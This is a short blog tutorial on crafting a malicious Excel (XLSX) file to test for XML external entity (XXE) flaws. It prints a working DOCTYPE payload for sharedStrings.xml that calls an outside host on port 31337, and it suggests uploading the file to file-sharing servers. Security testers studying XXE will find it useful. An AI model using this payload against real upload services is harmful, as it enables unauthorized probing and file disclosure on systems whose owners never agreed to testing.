Exploit XXE Vulnerability Using Excel File

From my last article, we can exploit XXE using Docx file. Now lets build exploit XXE vulnerability using Excel file.

Exploit XXE Vulnerability Using Excel File?

Microsoft released OOXML Document, OOXML Presentation and OOXML Workbook in 7 December 2006. Source: Wikipedia.

So, what is Office Open XML?

Office Open XML, also known as OpenXML or OOXML, is an XML-based format for office documents, including word processing documents, spreadsheets, presentations, as well as charts, diagrams, shapes, and other graphical material. The specification was developed by Microsoft and adopted by ECMA International as ECMA-376 in 2006. A second version was released in December, 2008, and a third version of the standard released in June, 2011. The specification has been adopted by ISO and IEC as ISO/IEC 29500. Source: officeopenxml.com

Enough for the intro..

First, create an Excel file (just like before, i am using LibreOffice), save it as xlsx extension and extract the xlsx file.

Exploit XXE Vulnerability Using Excel File

Here the contents of the files:

Exploit XXE Vulnerability Using Excel File

All we have to do is put our exploit into file sharedStrings.xml.

Exploit XXE Vulnerability Using Excel File

Here is the exploit i used.

<!DOCTYPE pv8 [
 <!ELEMENT pv8 ANY >
 <!ENTITY pv8xxe SYSTEM "http://xxx.xxx.xxx.xxx:31337/">]>
<pv8>&pv8xxe;</pv8>

You can upload it into file sharing server to test the vulnerability. 🙂

Leave a Comment

Your email address will not be published. Required fields are marked *